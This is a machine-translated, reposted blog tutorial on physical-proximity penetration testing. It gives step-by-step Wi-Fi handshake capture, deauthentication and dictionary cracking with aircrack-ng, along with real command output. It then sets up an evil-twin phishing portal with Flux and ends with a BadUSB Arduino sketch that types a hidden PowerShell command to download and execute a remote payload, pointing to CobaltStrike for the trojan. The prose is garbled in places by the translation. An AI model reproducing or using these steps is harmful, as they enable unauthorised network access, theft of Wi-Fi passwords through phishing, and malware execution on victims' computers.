Near source penetration test

๐ŸŒ• Write in front

  • ๐ŸŠ Blog home page: Scorpio_m7
  • ๐ŸŽ‰ Welcome to pay attention ๐Ÿ”Ž give the thumbs-up ๐Ÿ‘ Collection โญ Leave a message ๐Ÿ“
  • ๐ŸŒŸ This article is written by Scorpio_m7 original, CSDN first!
  • ๐Ÿ“† Starting time: ๐ŸŒน January 28, 2022 ๐ŸŒน
  • โœ‰๏ธ Persistence and hard work will surely bring poetry and distance!
  • ๐Ÿ™ The author's level is very limited. If you find an error, please leave a message! Thank you very much!

wifi penetration

Wifi password explosion

Using online passwords Generate 1 Txt dictionary. First check the information of the wireless network card by using the aircraft ng included in kail

root@kali:~# iwconfig 
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

kill the process that may be affected. Enable the monitoring mode of the wireless network card, air ng start wlan0. After successful activation, Ifconfig can see the information of the wireless network card. Monitor all wifi communication nearby through airodump ng wlan0mon, and exit after determining the target. Continuously run airdump ng -- BSSID f6:4c: a1:b5: c6:81 - C 10 - W test wlan0mon in the background to grab the wireless communication of the specified ap, where - C specifies the corresponding channel. Then attack the designated wireless client and router to obtain the handshake packet

root@kali:~# aireplay-ng -0 2 -a F6:4C:A1:B5:C6:81 -c 20:64:CB:0E:E3:ED wlan0mon
14:52:26  Waiting for beacon frame (BSSID: F6:4C:A1:B5:C6:81) on channel 11
14:52:26  Sending 64 directed DeAuth (code 7). STMAC: [20:64:CB:0E:E3:ED] [ 1|62 ACKs]
14:52:27  Sending 64 directed DeAuth (code 7). STMAC: [20:64:CB:0E:E3:ED] [ 0|65 ACKs]

Check the monitoring process running in the background. If you catch the packet, it will be successful

root@kali:~# airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 11 -w test wlan0mon
14:50:39  Created capture file "test-01.cap".
 CH 11 ][ Elapsed: 12 mins ][ 2021-10-26 15:03 ][ WPA handshake: F6:4C:A1:B5:C6:81 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 F6:4C:A1:B5:C6:81  -25  27     6548       59    0  11  360   WPA2 CCMP   PSK  DESKTOP-ATOB8DH 5656                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 F6:4C:A1:B5:C6:81  20:64:CB:0E:E3:ED   -1    1e- 0      0       51

Crack the password of the handshake package through collision and obtain the wifi password

root@kali:~# aircrack-ng -w 1.txt test-01.cap 
Reading packets, please wait...
Opening test-01.cap
Read 3938 packets.
   #  BSSID              ESSID                     Encryption
   1  F6:4C:A1:B5:C6:81  DESKTOP-ATOB8DH 5656      WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening test-01.cap
Read 3938 packets.
1 potential targets
                               Aircrack-ng 1.6 
      [00:00:00] 1/1 keys tested (25.69 k/s) 
      Time left: --
                           KEY FOUND! [ 12345678 ]
      Master Key     : 53 CB 0A A3 F1 FD 34 35 78 A6 C9 FF 24 FC E6 77 
                       02 21 79 8F 36 A9 31 47 7E 33 E6 A8 F0 34 E5 3F 
      Transient Key  : C7 D1 DD 3D D2 CB 16 34 55 C7 CC 92 6C F8 0C 24 
                       C0 27 A2 2C BA 55 8E 44 A9 5D 05 B9 23 1A 04 0D 
                       BF DD 92 F1 EE 03 8A A3 3E D4 21 90 43 E7 8F 53 
                       01 B4 A6 58 D0 49 D1 6B 0B 8E 0B CD 32 EE C8 EA 
      EAPOL HMAC     : 77 E9 ED 54 77 B7 65 99 D5 B2 01 8B 3F 88 58 66

WIFI fishing

use Flux tool First, iwconfig checks the information of the wireless network card, and then flux - I installs the dependency

  1. First, get the target handshake packet

    [2] Handshake Snooper retrieval WPA/WPA2 Encrypted hash.
[3] Scan all channels  (2.4GHz & 5Ghz)
[2] skip
[2] aireplay-ng De authentication method (Aggressiveness)
[2] cowpatty verification (This is recommended)
[1] Every 30 seconds (recommend).
[2] Synchronously (recommend).

  2. Then flood attacks the target ap to stop the wireless service

    [1] Select attack mode
[1] The exclusive portal creates an "evil twin" access point
[2] skip
[2] wlan0    [*] Ralink Technology, Corp. RT2870/RT3070      
[2] aireplay
[1] rogue AP - hostapd (recommend)
[1] hash - cowpatty
[1] Using captured hash file
[2] cowpatty verification (This is recommended)

  3. Through the phishing framework, forge the target network information and induce users to connect

    [1] establish SSL certificate
[2] simulation
[03] General certification web page                              Chinese

  4. After the user connects to the phishing wifi, the captured handshake packet input by the user is verified with the previously authenticated handshake packet; If the verification is successful, stop attacking the target ap, otherwise continue the attack until the successful cracking

Wireless router vulnerability exploitation

RouterSploit It contains hundreds of vulnerability exploitation modules of 27 + brands, involving hundreds of routers, cameras and other devices. The device model can be automatically set and the exploitable vulnerabilities can be automatically scanned.

badusb

Tool preparation

digispark development board. Taobao link: https://m.tb.cn/h.fe2pxMT?sm=0b41c0

Install the IDE of arduino

https://downloads.arduino.cc/arduino-1.8.13-windows.exe

Drive installation

If it is a 64 bit operating system, select dpinst 64 Exe, otherwise select dpinst exe

Configuration environment

View the link, complete the configuration, and burn the code: https://www.cnblogs.com/qianxiao996/p/13574566.html

#include "DigiKeyboard.h"
void setup() {
  // put your setup code here, to run once:
  DigiKeyboard.delay(2000);//Wait for 2 seconds
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//Send win+R
  DigiKeyboard.delay(800);
  //DigiKeyboard.println("cmd /T:01 /K mode CON: COLS=16 LINES=1");// Minimize CMD window to ensure concealment
  DigiKeyboard.delay(2000);
  DigiKeyboard.println(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://ip:80/a'); "); / / payload to execute
  //DigiKeyboard.println("echo set-alias -name rookie -value Invoke-Expression;rookie(new-object net.webclient).downloadstring('http://ip:80/a') | powershell -");
  DigiKeyboard.delay(10000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  //DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);// After execution, alt+F4 closes the window
  DigiKeyboard.delay(10000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//Send win+R
}

void loop() {
  // put your main code here, to run repeatedly:
}

The function is to download, open the windows + R running window, and enter the command to execute. Click upload and insert your badusb within 60s.

CobaltStrike generate Trojan

Attacks - > webdrive by - > scratched web delivery - > set listening - > copy generated command to code

Other production methods of badusb https://mrxn.net/jswz/diy-myself-badusb.html

Keywords: network security penetration test Web Security

Added by walnoot on Sat, 29 Jan 2022 02:34:03 +0200

Popular Keywords

©2024 Programming VIP